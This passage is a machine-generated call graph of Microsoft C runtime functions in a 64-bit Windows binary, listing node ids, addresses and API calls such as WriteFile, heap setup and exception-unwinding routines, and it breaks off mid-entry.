7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18321->18326 18322->18323 18323->18317 18324 7fef9d3a158 GetLastError 18324->18323 18325 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18325->18326 18326->18315 18326->18318 18326->18321 18326->18323 18326->18324 18326->18325 18327 7fef9d3a1b5 GetLastError 18326->18327 18327->18323 17695 7fef9d3bcbd 17696 7fef9d3b99c 17695->17696 17697 7fef9d3cc93 17696->17697 17702 7fef9d3bada 17696->17702 17698 7fef9d2bd70 _invalid_parameter 17 API calls 17697->17698 17701 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17697->17701 17698->17701 17699 7fef9d23280 __GSHandlerCheck 8 API calls 17700 7fef9d3cd90 17699->17700 17701->17699 17703 7fef9d2bd70 _invalid_parameter 17 API calls 17702->17703 17703->17701 17293 7fef9d3c1a3 17302 7fef9d3c1b0 get_int64_arg 17293->17302 17294 7fef9d3b99c 17295 7fef9d3cc93 17294->17295 17300 7fef9d3bada 17294->17300 17296 7fef9d2bd70 _invalid_parameter 17 API calls 17295->17296 17299 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17295->17299 17296->17299 17298 7fef9d23280 __GSHandlerCheck 8 API calls 17301 7fef9d3cd90 17298->17301 17299->17298 17303 7fef9d2bd70 _invalid_parameter 17 API calls 17300->17303 17302->17294 17304 7fef9d3b530 17302->17304 17303->17299 17307 7fef9d3b090 17304->17307 17306 7fef9d3b56c 17306->17302 17308 7fef9d3b0b7 17307->17308 17309 7fef9d3b168 17308->17309 17310 7fef9d3b1a6 _CrtMemDumpAllObjectsSince 17308->17310 17318 7fef9d3b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17308->17318 17311 7fef9d2bd70 _invalid_parameter 17 API calls 17309->17311 17312 7fef9d3b1cf 17310->17312 17313 7fef9d3b347 _CrtMemDumpAllObjectsSince 17310->17313 17311->17318 17317 7fef9d2bd70 _invalid_parameter 17 API calls 17312->17317 17312->17318 17314 7fef9d3b359 WideCharToMultiByte 17313->17314 17315 7fef9d3b3ab 17314->17315 17316 7fef9d3b3c1 GetLastError 17315->17316 17315->17318 17316->17318 17319 7fef9d3b3d0 _calloc_dbg_impl 17316->17319 17317->17318 17318->17306 17319->17318 17320 7fef9d2bd70 _invalid_parameter 17 API calls 17319->17320 17320->17318 17708 7fef9d3809f 17709 7fef9d380b0 _calloc_dbg_impl 17708->17709 17710 7fef9d38145 _calloc_dbg_impl 17708->17710 17710->17709 17711 7fef9d2bd70 _invalid_parameter 17 API calls 17710->17711 17711->17709 17712 7fef9d32c9f 17713 7fef9d32caf 17712->17713 17714 7fef9d32ca6 17712->17714 17714->17713 17715 7fef9d2bd70 _invalid_parameter 17 API calls 17714->17715 17715->17713 17716 7fef9d3d4a0 17717 7fef9d3d4b7 std::bad_exception::~bad_exception 17716->17717 17718 7fef9d3d4cc 17717->17718 17719 7fef9d3d710 _Ref_count LeaveCriticalSection 17717->17719 17719->17718 18328 7fef9d3a7a0 18336 7fef9d3a61f 18328->18336 18329 7fef9d3a726 WideCharToMultiByte 18330 7fef9d3a791 GetLastError 18329->18330 18329->18336 18331 7fef9d3a887 _dosmaperr __doserrno 18330->18331 18332 7fef9d23280 __GSHandlerCheck 8 API calls 18331->18332 18335 7fef9d3a9f5 18332->18335 18333 7fef9d3a7b0 WriteFile 18334 7fef9d3a857 GetLastError 18333->18334 18333->18336 18334->18336 18336->18329 18336->18331 18336->18333 16665 7fef9d2aca8 16666 7fef9d2acb2 16665->16666 16667 7fef9d274e0 __crtExitProcess 3 API calls 16666->16667 16668 7fef9d2acbc RtlAllocateHeap 16667->16668 17724 7fef9d25cad 17727 7fef9d25cb8 17724->17727 17726 7fef9d26201 17728 7fef9d25e1a _realloc_dbg 17727->17728 17729 7fef9d29360 LeaveCriticalSection 17727->17729 17729->17726 18349 7fef9d23faa 18350 7fef9d23e30 LeaveCriticalSection 18349->18350 18351 7fef9d23fb6 GetCurrentThreadId 18350->18351 18352 7fef9d23fea SetLastError 18351->18352 18353 7fef9d2cb4f 18358 7fef9d2cb5c 18353->18358 18354 7fef9d23280 __GSHandlerCheck 8 API calls 18355 7fef9d2cf0f 18354->18355 18356 7fef9d2cbeb GetStdHandle 18357 7fef9d2cc94 18356->18357 18360 7fef9d2cc07 std::exception::_Copy_str 18356->18360 18357->18354 18358->18356 18358->18357 18359 7fef9d2cc99 18358->18359 18359->18357 18361 7fef9d31640 17 API calls 18359->18361 18360->18357 18363 7fef9d2cc73 WriteFile 18360->18363 18362 7fef9d2cd10 18361->18362 18364 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18362->18364 18363->18357 18365 7fef9d2cd3d GetModuleFileNameW 18364->18365 18366 7fef9d2cd68 18365->18366 18371 7fef9d2cdb1 18365->18371 18367 7fef9d31640 17 API calls 18366->18367 18368 7fef9d2cd84 18367->18368 18369 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18368->18369 18369->18371 18370 7fef9d2ce5e 18372 7fef9d32d80 17 API calls 18370->18372 18371->18370 18382 7fef9d33380 18371->18382 18373 7fef9d2ce76 18372->18373 18374 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18373->18374 18376 7fef9d2cea3 18374->18376 18378 7fef9d32d80 17 API calls 18376->18378 18377 7fef9d2ce31 18379 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18377->18379 18380 7fef9d2ceb9 18378->18380 18379->18370 18381 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18380->18381 18381->18357 18384 7fef9d333a6 18382->18384 18383 7fef9d3342f 18385 7fef9d2bd70 _invalid_parameter 17 API calls 18383->18385 18384->18383 18386 7fef9d3346d _calloc_dbg_impl 18384->18386 18389 7fef9d333bc _calloc_dbg_impl 18384->18389 18385->18389 18387 7fef9d335fb 18386->18387 18386->18389 18390 7fef9d33639 _calloc_dbg_impl 18386->18390 18388 7fef9d2bd70 _invalid_parameter 17 API calls 18387->18388 18388->18389 18389->18377 18390->18389 18391 7fef9d2bd70 _invalid_parameter 17 API calls 18390->18391 18391->18389 17739 7fef9d25854 17740 7fef9d2585b _calloc_dbg_impl 17739->17740 17741 7fef9d2c020 _free_base 2 API calls 17740->17741 17742 7fef9d259d5 17741->17742 17321 7fef9d40550 17322 7fef9d40575 17321->17322 17323 7fef9d4055e 17321->17323 17323->17322 17324 7fef9d40568 CloseHandle 17323->17324 17324->17322 18829 7fef9d3465b 18839 7fef9d3445a __SehTransFilter 18829->18839 18830 7fef9d347d7 18831 7fef9d3485b 18830->18831 18832 7fef9d2cf80 _inconsistency 36 API calls 18830->18832 18832->18831 18833 7fef9d3466c __SehTransFilter 18833->18830 18834 7fef9d35bb0 __SehTransFilter 36 API calls 18833->18834 18835 7fef9d34727 18834->18835 18835->18830 18836 7fef9d2e500 __GetUnwindTryBlock 37 API calls 18835->18836 18837 7fef9d34767 18836->18837 18838 7fef9d2edc0 __SehTransFilter 9 API calls 18837->18838 18838->18830 18839->18833 18840 7fef9d35180 __SehTransFilter 38 API calls 18839->18840 18840->18839 17325 7fef9d3595c 17326 7fef9d2cf50 terminate 35 API calls 17325->17326 17327 7fef9d35961 17326->17327 17743 7fef9d2a057 17744 7fef9d2a061 17743->17744 17745 7fef9d2a234 17744->17745 17752 7fef9d2a08e __initmbctable 17744->17752 17747 7fef9d2a25d IsValidCodePage 17745->17747 17751 7fef9d2a22d __initmbctable 17745->17751 17746 7fef9d23280 __GSHandlerCheck 8 API calls 17748 7fef9d2a470 17746->17748 17749 7fef9d2a27b GetCPInfo 17747->17749 17747->17751 17750 7fef9d2a295 __initmbctable 17749->17750 17749->17751 17754 7fef9d2a5e0 __initmbctable 19 API calls 17750->17754 17751->17746 17753 7fef9d2a5e0 __initmbctable 19 API calls 17752->17753 17753->17751 17754->17751 18419 7fef9d25357 18422 7fef9d29360 LeaveCriticalSection 18419->18422 18421 7fef9d25361 18422->18421 17760 7fef9d2405b 17762 7fef9d2406e 17760->17762 17766 7fef9d29360 LeaveCriticalSection 17762->17766 17764 7fef9d24224 17765 7fef9d241bb _updatetlocinfoEx_nolock 17767 7fef9d29360 LeaveCriticalSection 17765->17767 17766->17765 17767->17764 17328 7fef9d2e55a 17329 7fef9d2e564 17328->17329 17330 7fef9d2e5c2 RtlLookupFunctionEntry 17329->17330 17331 7fef9d2e601 17329->17331 17330->17331 18841 7fef9d2425a FlsGetValue FlsSetValue 18842 7fef9d24283 18841->18842 16617 7fef9d27640 GetStartupInfoW 16619 7fef9d27676 _calloc_dbg 16617->16619 16618 7fef9d27ce0 SetHandleCount 16629 7fef9d27689 16618->16629 16621 7fef9d27ab9 16619->16621 16627 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16619->16627 16628 7fef9d27a19 GetFileType 16619->16628 16619->16629 16620 7fef9d27b95 GetStdHandle 16622 7fef9d27bb9 16620->16622 16624 7fef9d27c7b 16620->16624 16621->16618 16621->16620 16621->16624 16623 7fef9d27bc8 GetFileType 16622->16623 16622->16624 16623->16624 16625 7fef9d27beb InitializeCriticalSectionAndSpinCount 16623->16625 16624->16618 16625->16624 16625->16629 16627->16621 16627->16629 16628->16621 16628->16627 17332 7fef9d21140 17333 7fef9d2116a 17332->17333 17334 7fef9d2118c 17333->17334 17335 7fef9d2119a FileTimeToSystemTime 17333->17335 17337 7fef9d23280 __GSHandlerCheck 8 API calls 17334->17337 17335->17334 17336 7fef9d211ae 17335->17336 17340 7fef9d21000 GetThreadLocale GetDateFormatA 17336->17340 17339 7fef9d211d0 17337->17339 17341 7fef9d21062 GetThreadLocale GetTimeFormatA 17340->17341 17342 7fef9d2105b 17340->17342 17341->17342 17342->17334 17768 7fef9d28040 17769 7fef9d28056 17768->17769 17770 7fef9d2805b GetModuleFileNameA 17768->17770 17771 7fef9d2aa40 __initmbctable 24 API calls 17769->17771 17772 7fef9d28083 17770->17772 17771->17770 18843 7fef9d29240 18844 7fef9d2925f 18843->18844 18845 7fef9d2924d 18843->18845 18846 7fef9d29281 InitializeCriticalSectionAndSpinCount 18844->18846 18847 7fef9d29295 18844->18847 18846->18847 18849 7fef9d29360 LeaveCriticalSection 18847->18849 18849->18845 18850 7fef9d2ae40 18851 7fef9d2d490 std::exception::_Copy_str 17 API calls 18850->18851 18852 7fef9d2ae59 18851->18852 18853 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18852->18853 18854 7fef9d2ae86 std::exception::_Copy_str 18853->18854 18855 7fef9d30fd0 17 API calls 18854->18855 18858 7fef9d2af3a std::exception::_Copy_str 18854->18858 18856 7fef9d2af0d 18855->18856 18857 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18856->18857 18857->18858 18860 7fef9d2b2e0 18858->18860 18861 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18858->18861 18859 7fef9d2b33e 18863 7fef9d30cc0 25 API calls 18859->18863 18860->18859 18862 7fef9d2d490 std::exception::_Copy_str 17 API calls 18860->18862 18861->18860 18864 7fef9d2b311 18862->18864 18865 7fef9d2b358 18863->18865 18866 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18864->18866 18867 7fef9d2b37d 18865->18867 18868 7fef9d2cff0 terminate 34 API calls 18865->18868 18866->18859 18871 7fef9d23280 __GSHandlerCheck 8 API calls 18867->18871 18869 7fef9d2b373 18868->18869 18870 7fef9d27090 _exit 33 API calls 18869->18870 18870->18867 18872 7fef9d2b3a0 18871->18872 17343 7fef9d3f53e 17344 7fef9d3f55c 17343->17344 17345 7fef9d3f74d 17344->17345 17349 7fef9d40170 17344->17349 17347 7fef9d23280 __GSHandlerCheck 8 API calls 17345->17347 17348 7fef9d3f7c5 17347->17348 17350 7fef9d40185 17349->17350 17351 7fef9d3afb0 _fflush_nolock 17 API calls 17350->17351 17352 7fef9d401c7 17351->17352 17353 7fef9d401dc 17352->17353 17354 7fef9d3ab10 17 API calls 17352->17354 17355 7fef9d40326 17352->17355 17353->17345 17354->17355 17355->17353 17356 7fef9d39290 23 API calls 17355->17356 17356->17353 17773 7fef9d41040 17776 7fef9d2e8f0 17773->17776 17775 7fef9d4108f 17777 7fef9d2e90d 17776->17777 17780 7fef9d33cc0 17777->17780 17779 7fef9d2e980 17779->17775 17781 7fef9d33cdd 17780->17781 17783 7fef9d33d82 17781->17783 17784 7fef9d33ef3 __SehTransFilter 17781->17784 17795 7fef9d33d62 17781->17795 17785 7fef9d33dc8 17783->17785 17789 7fef9d33e40 17783->17789 17783->17795 17784->17795 17798 7fef9d340b0 17784->17798 17787 7fef9d33a60 __StateFromControlPc 36 API calls 17785->17787 17786 7fef9d2e790 __SehTransFilter 37 API calls 17786->17795 17788 7fef9d33dec 17787->17788 17792 7fef9d2cf80 _inconsistency 36 API calls 17788->17792 17794 7fef9d33e08 17788->17794 17790 7fef9d33e93 17789->17790 17791 7fef9d2cf80 _inconsistency 36 API calls 17789->17791 17796 7fef9d33ebd 17789->17796 17793 7fef9d34f20 __SehTransFilter 36 API calls 17790->17793 17791->17790 17792->17794 17793->17796 17797 7fef9d34f20 __SehTransFilter 36 API calls 17794->17797 17795->17779 17796->17786 17796->17795 17797->17795 17799 7fef9d33b40 __StateFromControlPc 36 API calls 17798->17799 17800 7fef9d340ea 17799->17800 17801 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17800->17801 17802 7fef9d34110 17801->17802 17843 7fef9d33c70 17802->17843 17805 7fef9d34133 __SetState 17846 7fef9d33c00 17805->17846 17806 7fef9d34176 17807 7fef9d33c70 __GetUnwindTryBlock 37 API calls 17806->17807 17808 7fef9d34174 17807->17808 17810 7fef9d2cf80 _inconsistency 36 API calls 17808->17810 17818 7fef9d341af _ValidateRead _SetThrowImageBase 17808->17818 17810->17818 17811 7fef9d347d9 17813 7fef9d347f3 17811->17813 17814 7fef9d34847 17811->17814 17820 7fef9d347d7 17811->17820 17812 7fef9d34347 17812->17811 17815 7fef9d343f5 17812->17815 17860 7fef9d34960 17813->17860 17817 7fef9d2cf50 terminate 35 API calls 17814->17817 17823 7fef9d3466c __SehTransFilter 17815->17823 17855 7fef9d2ea30 17815->17855 17817->17820 17818->17812 17819 7fef9d34235 17818->17819 17827 7fef9d2cf80 _inconsistency 36 API calls 17818->17827 17830 7fef9d3428e 17818->17830 17819->17795 17820->17819 17822 7fef9d2cf80 _inconsistency 36 API calls 17820->17822 17822->17819 17823->17820 17824 7fef9d35bb0 __SehTransFilter 36 API calls 17823->17824 17825 7fef9d34727 17824->17825 17825->17820 17826 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17825->17826 17828 7fef9d34767 17826->17828 17827->17830 17829 7fef9d2edc0 __SehTransFilter 9 API calls 17828->17829 17829->17820 17831 7fef9d2cf80 _inconsistency 36 API calls 17830->17831 17832 7fef9d342fa 17830->17832 17831->17832 17832->17812 17834 7fef9d35bb0 __SehTransFilter 36 API calls 17832->17834 17833 7fef9d34450 __SehTransFilter 17833->17823 17835 7fef9d35180 __SehTransFilter 38 API calls 17833->17835 17836 7fef9d34340 __SehTransFilter 17834->17836 17835->17833 17836->17812 17837 7fef9d34393 17836->17837 17838 7fef9d3435a __SehTransFilter 17836->17838 17839 7fef9d2cf50 terminate 35 API calls 17837->17839 17849 7fef9d34870 17838->17849 17839->17812 17844 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17843->17844 17845 7fef9d33c9c 17844->17845 17845->17805 17845->17806 17847 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17846->17847 17848 7fef9d33c31 17847->17848 17848->17808 17870 7fef9d3d4e0 17849->17870 17852 7fef9d3d320 17854 7fef9d3d375 17852->17854 17853 7fef9d3d3ba RaiseException 17853->17812 17854->17853 17856 7fef9d33b40 __StateFromControlPc 36 API calls 17855->17856 17857 7fef9d2ea6f 17856->17857 17858 7fef9d2cf80 _inconsistency 36 API calls 17857->17858 17859 7fef9d2ea7a 17857->17859 17858->17859 17859->17833 17862 7fef9d34990 17860->17862 17867 7fef9d3498b 17860->17867 17861 7fef9d349b2 __SehTransFilter 17863 7fef9d34a41 17861->17863 17864 7fef9d2cf80 _inconsistency 36 API calls 17861->17864 17861->17867 17862->17861 17873 7fef9d23d00 RtlEncodePointer 17862->17873 17865 7fef9d2ea30 __SehTransFilter 36 API calls 17863->17865 17864->17863 17868 7fef9d34a8e __SehTransFilter 17865->17868 17867->17820 17868->17867 17869 7fef9d35180 __SehTransFilter 38 API calls 17868->17869 17869->17867 17871 7fef9d3d660 std::exception::_Copy_str 17 API calls 17870->17871 17872 7fef9d3437d 17871->17872 17872->17852 17873->17861 17874 7fef9d3dc41 17875 7fef9d3ee40 25 API calls 17874->17875 17877 7fef9d3da75 17875->17877 17876 7fef9d3eca1 17878 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17876->17878 17879 7fef9d2bd70 _invalid_parameter 17 API calls 17876->17879 17877->17876 17881 7fef9d3dbb5 17877->17881 17880 7fef9d23280 __GSHandlerCheck 8 API calls 17878->17880 17879->17878 17882 7fef9d3ed9e 17880->17882 17883 7fef9d2bd70 _invalid_parameter 17 API calls 17881->17883 17883->17878 18873 7fef9d40e40 18874 7fef9d40e50 18873->18874 18876 7fef9d40e5e 18873->18876 18875 7fef9d23e00 3 API calls 18874->18875 18874->18876 18875->18876 17884 7fef9d2d04a 17885 7fef9d2d1d8 DecodePointer 17884->17885 17886 7fef9d2d1e8 17885->17886 17887 7fef9d27090 _exit 33 API calls 17886->17887 17888 7fef9d2d209 17886->17888 17892 7fef9d2d1f0 17886->17892 17887->17888 17890 7fef9d2d289 17888->17890 17893 7fef9d23d00 RtlEncodePointer 17888->17893 17890->17892 17894 7fef9d29360 LeaveCriticalSection 17890->17894 17893->17890 17894->17892 16228 7fef9d23471 16229 7fef9d234bc 16228->16229 16230 7fef9d2347a 16228->16230 16231 7fef9d23496 16230->16231 16240 7fef9d270b0 16230->16240 16243 7fef9d27d00 16231->16243 16238 7fef9d234a5 16238->16229 16239 7fef9d23e00 3 API calls 16238->16239 16239->16229 16253 7fef9d27280 16240->16253 16245 7fef9d27d0e 16243->16245 16244 7fef9d2349b 16247 7fef9d23e00 16244->16247 16245->16244 16246 7fef9d27d87 DeleteCriticalSection 16245->16246 16246->16245 16248 7fef9d23e23 16247->16248 16249 7fef9d23e0d FlsFree 16247->16249 16413 7fef9d290b0 16248->16413 16249->16248 16252 7fef9d288d0 HeapDestroy 16252->16238 16254 7fef9d27296 _exit 16253->16254 16255 7fef9d272c7 RtlDecodePointer 16254->16255 16261 7fef9d27368 _initterm 16254->16261 16274 7fef9d2744e 16254->16274 16259 7fef9d272e5 DecodePointer 16255->16259 16255->16261 16256 7fef9d2745e 16258 7fef9d270c3 16256->16258 16260 7fef9d27520 _exit LeaveCriticalSection 16256->16260 16258->16231 16270 7fef9d27314 16259->16270 16262 7fef9d27479 16260->16262 16261->16274 16277 7fef9d26210 16261->16277 16300 7fef9d274e0 16262->16300 16267 7fef9d2736d DecodePointer 16276 7fef9d23d00 RtlEncodePointer 16267->16276 16270->16261 16270->16267 16273 7fef9d27391 DecodePointer DecodePointer 16270->16273 16275 7fef9d23d00 RtlEncodePointer 16270->16275 16271 7fef9d27449 16290 7fef9d26f10 16271->16290 16273->16270 16274->16256 16297 7fef9d27520 16274->16297 16275->16270 16276->16270 16278 7fef9d26229 16277->16278 16279 7fef9d2628f 16278->16279 16280 7fef9d262cb 16278->16280 16303 7fef9d2bd70 DecodePointer 16279->16303 16307 7fef9d29360 LeaveCriticalSection 16280->16307 16283 7fef9d262c3 16283->16274 16284 7fef9d27100 16283->16284 16285 7fef9d27112 16284->16285 16286 7fef9d271e4 DecodePointer 16285->16286 16287 7fef9d271fe 16286->16287 16332 7fef9d23d00 RtlEncodePointer 16287->16332 16289 7fef9d27219 16289->16271 16333 7fef9d263e0 16290->16333 16292 7fef9d26f33 16293 7fef9d26f8e 16292->16293 16341 7fef9d26660 16292->16341 16295 7fef9d23280 __GSHandlerCheck 8 API calls 16293->16295 16296 7fef9d26fa7 16295->16296 16296->16274 16409 7fef9d29360 LeaveCriticalSection 16297->16409 16299 7fef9d2752e 16299->16256 16410 7fef9d27490 GetModuleHandleW 16300->16410 16304 7fef9d2bdd0 16303->16304 16305 7fef9d2bdac 16303->16305 16308 7fef9d2be00 16304->16308 16305->16283 16307->16283 16311 7fef9d2be50 16308->16311 16312 7fef9d2be81 __GSHandlerCheck 16311->16312 16313 7fef9d2be8d RtlCaptureContext RtlLookupFunctionEntry 16311->16313 16312->16313 16314 7fef9d2bf64 16313->16314 16315 7fef9d2bf1c RtlVirtualUnwind 16313->16315 16316 7fef9d2bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16314->16316 16315->16316 16317 7fef9d2bfde __GSHandlerCheck 16316->16317 16320 7fef9d23280 16317->16320 16319 7fef9d2be2d GetCurrentProcess TerminateProcess 16319->16305 16321 7fef9d23289 16320->16321 16322 7fef9d23294 16321->16322 16323 7fef9d23720 RtlCaptureContext RtlLookupFunctionEntry 16321->16323 16322->16319 16324 7fef9d237a5 16323->16324 16325 7fef9d23764 RtlVirtualUnwind 16323->16325 16326 7fef9d237c7 IsDebuggerPresent 16324->16326 16325->16326 16331 7fef9d28d90 16326->16331 16328 7fef9d23826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16329 7fef9d2384e GetCurrentProcess TerminateProcess 16328->16329 16330 7fef9d23844 __GSHandlerCheck 16328->16330 16329->16319 16330->16329 16331->16328 16332->16289 16334 7fef9d263f1 16333->16334 16335 7fef9d26447 16334->16335 16338 7fef9d26480 16334->16338 16336 7fef9d2bd70 _invalid_parameter 17 API calls 16335->16336 16337 7fef9d2647b 16336->16337 16337->16292 16340 7fef9d26504 16338->16340 16345 7fef9d29360 LeaveCriticalSection 16338->16345 16340->16292 16342 7fef9d26681 _CrtMemDumpAllObjectsSince 16341->16342 16346 7fef9d26850 16342->16346 16344 7fef9d26698 _LocaleUpdate::~_LocaleUpdate 16344->16293 16345->16337 16347 7fef9d26871 16346->16347 16348 7fef9d26ba6 16347->16348 16351 7fef9d268ed _CrtIsValidPointer 16347->16351 16376 7fef9d29360 LeaveCriticalSection 16348->16376 16350 7fef9d26bb0 16350->16344 16352 7fef9d2695e IsBadReadPtr 16351->16352 16353 7fef9d26976 16351->16353 16360 7fef9d2692f 16351->16360 16352->16353 16354 7fef9d26ad2 16353->16354 16355 7fef9d26a29 16353->16355 16356 7fef9d26b2d 16354->16356 16357 7fef9d26add 16354->16357 16358 7fef9d26abe 16355->16358 16359 7fef9d26a86 IsBadReadPtr 16355->16359 16356->16360 16363 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16356->16363 16362 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16357->16362 16364 7fef9d26bf0 16358->16364 16359->16358 16359->16360 16360->16344 16362->16360 16363->16360 16365 7fef9d26c28 16364->16365 16366 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 16365->16366 16367 7fef9d26c7a _CrtMemDumpAllObjectsSince 16365->16367 16368 7fef9d23280 __GSHandlerCheck 8 API calls 16366->16368 16371 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16367->16371 16377 7fef9d2c260 16367->16377 16369 7fef9d26e89 16368->16369 16369->16360 16381 7fef9d2c0c0 16371->16381 16373 7fef9d26e12 16373->16360 16374 7fef9d26dc7 16374->16373 16384 7fef9d26ea0 16374->16384 16376->16350 16378 7fef9d2c286 _CrtMemDumpAllObjectsSince wcsxfrm 16377->16378 16380 7fef9d2c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16378->16380 16388 7fef9d2f4d0 16378->16388 16380->16371 16399 7fef9d32260 16381->16399 16383 7fef9d2c103 16383->16374 16385 7fef9d26ebd 16384->16385 16386 7fef9d26ed1 16384->16386 16385->16386 16387 7fef9d2be00 _invoke_watson_if_error 16 API calls 16385->16387 16386->16373 16387->16386 16389 7fef9d2f4f9 _CrtMemDumpAllObjectsSince 16388->16389 16392 7fef9d2f570 16389->16392 16391 7fef9d2f550 _LocaleUpdate::~_LocaleUpdate 16391->16380 16393 7fef9d2f599 MultiByteToWideChar 16392->16393 16395 7fef9d2f604 _CrtMemDumpAllObjectsSince_stat 16393->16395 16396 7fef9d2f60b malloc _calloc_dbg_impl _MarkAllocaS 16393->16396 16395->16391 16396->16395 16397 7fef9d2f68b MultiByteToWideChar 16396->16397 16397->16395 16398 7fef9d2f6ca GetStringTypeW 16397->16398 16398->16395 16400 7fef9d3228b 16399->16400 16401 7fef9d322e1 16400->16401 16402 7fef9d3231f 16400->16402 16403 7fef9d2bd70 _invalid_parameter 17 API calls 16401->16403 16404 7fef9d32385 16402->16404 16407 7fef9d323c3 _calloc_dbg_impl 16402->16407 16406 7fef9d32315 _calloc_dbg_impl 16403->16406 16405 7fef9d2bd70 _invalid_parameter 17 API calls 16404->16405 16405->16406 16406->16383 16407->16406 16408 7fef9d2bd70 _invalid_parameter 17 API calls 16407->16408 16408->16406 16409->16299 16411 7fef9d274b2 GetProcAddress 16410->16411 16412 7fef9d274d1 ExitProcess 16410->16412 16411->16412 16416 7fef9d290be 16413->16416 16414 7fef9d290fd DeleteCriticalSection 16414->16416 16415 7fef9d234a0 16415->16252 16416->16414 16417 7fef9d2914d 16416->16417 16417->16415 16418 7fef9d29196 DeleteCriticalSection 16417->16418 16418->16417 16456 7fef9d28670 GetEnvironmentStringsW 16457 7fef9d28690 16456->16457 16459 7fef9d28697 WideCharToMultiByte 16456->16459 16460 7fef9d2875f FreeEnvironmentStringsW 16459->16460 16461 7fef9d28733 16459->16461 16460->16457 16461->16460 16462 7fef9d2876e WideCharToMultiByte 16461->16462 16463 7fef9d287c2 FreeEnvironmentStringsW 16462->16463 16464 7fef9d287aa 16462->16464 16463->16457 16464->16463 17365 7fef9d3e16f 17366 7fef9d3e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 17365->17366 17367 7fef9d3eadf 17366->17367 17377 7fef9d3da75 17366->17377 17388 7fef9d3eec0 17366->17388 17392 7fef9d3ef10 17367->17392 17370 7fef9d3eafd 17371 7fef9d3eb33 17370->17371 17373 7fef9d3eec0 25 API calls 17370->17373 17372 7fef9d3ec29 17371->17372 17386 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17371->17386 17374 7fef9d3ebda 17372->17374 17375 7fef9d3ef10 25 API calls 17372->17375 17373->17371 17374->17377 17379 7fef9d3eec0 25 API calls 17374->17379 17375->17374 17376 7fef9d3eca1 17378 7fef9d2bd70 _invalid_parameter 17 API calls 17376->17378 17381 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17376->17381 17377->17376 17382 7fef9d3dbb5 17377->17382 17378->17381 17379->17377 17380 7fef9d23280 __GSHandlerCheck 8 API calls 17383 7fef9d3ed9e 17380->17383 17381->17380 17385 7fef9d2bd70 _invalid_parameter 17 API calls 17382->17385 17385->17381 17386->17374 17396 7fef9d3f000 17386->17396 17403 7fef9d3ee40 17386->17403 17390 7fef9d3eed7 17388->17390 17389 7fef9d3ee40 25 API calls 17389->17390 17390->17389 17391 7fef9d3ef07 17390->17391 17391->17367 17394 7fef9d3ef2c 17392->17394 17393 7fef9d3ef4d 17393->17370 17394->17393 17395 7fef9d3ee40 25 API calls 17394->17395 17395->17394 17397 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17396->17397 17400 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17396->17400 17398 7fef9d3f276 _CrtMemDumpAllObjectsSince 17397->17398 17397->17400 17401 7fef9d3f146 _CrtMemDumpAllObjectsSince 17397->17401 17399 7fef9d3f29d MultiByteToWideChar 17398->17399 17399->17400 17400->17386 17401->17400 17402 7fef9d3f1b5 MultiByteToWideChar 17401->17402 17402->17400 17404 7fef9d3ee62 17403->17404 17406 7fef9d3ee6e 17404->17406 17407 7fef9d3f360 17404->17407 17406->17386 17408 7fef9d3f719 17407->17408 17409 7fef9d3f399 17407->17409 17411 7fef9d40170 23 API calls 17408->17411 17442 7fef9d3f4f2 17408->17442 17410 7fef9d3afb0 _fflush_nolock 17 API calls 17409->17410 17412 7fef9d3f3a6 17410->17412 17411->17442 17413 7fef9d3f3ed 17412->17413 17415 7fef9d3afb0 _fflush_nolock 17 API calls 17412->17415 17418 7fef9d3f4c7 17413->17418 17419 7fef9d3afb0 _fflush_nolock 17 API calls 17413->17419 17414 7fef9d23280 __GSHandlerCheck 8 API calls 17416 7fef9d3f7c5 17414->17416 17417 7fef9d3f3b8 17415->17417 17416->17406 17417->17413 17420 7fef9d3afb0 _fflush_nolock 17 API calls 17417->17420 17421 7fef9d40170 23 API calls 17418->17421 17418->17442 17422 7fef9d3f43d 17419->17422 17423 7fef9d3f3ca 17420->17423 17421->17442 17424 7fef9d3f484 17422->17424 17426 7fef9d3afb0 _fflush_nolock 17 API calls 17422->17426 17425 7fef9d3afb0 _fflush_nolock 17 API calls 17423->17425 17424->17418 17427 7fef9d3f561 17424->17427 17425->17413 17428 7fef9d3f44f 17426->17428 17429 7fef9d3afb0 _fflush_nolock 17 API calls 17427->17429 17428->17424 17430 7fef9d3afb0 _fflush_nolock 17 API calls 17428->17430 17431 7fef9d3f56e 17429->17431 17432 7fef9d3f461 17430->17432 17433 7fef9d3f5b8 17431->17433 17434 7fef9d3afb0 _fflush_nolock 17 API calls 17431->17434 17435 7fef9d3afb0 _fflush_nolock 17 API calls 17432->17435 17433->17408 17437 7fef9d3f604 17433->17437 17436 7fef9d3f580 17434->17436 17435->17424 17436->17433 17439 7fef9d3afb0 _fflush_nolock 17 API calls 17436->17439 17438 7fef9d3b530 wctomb_s 19 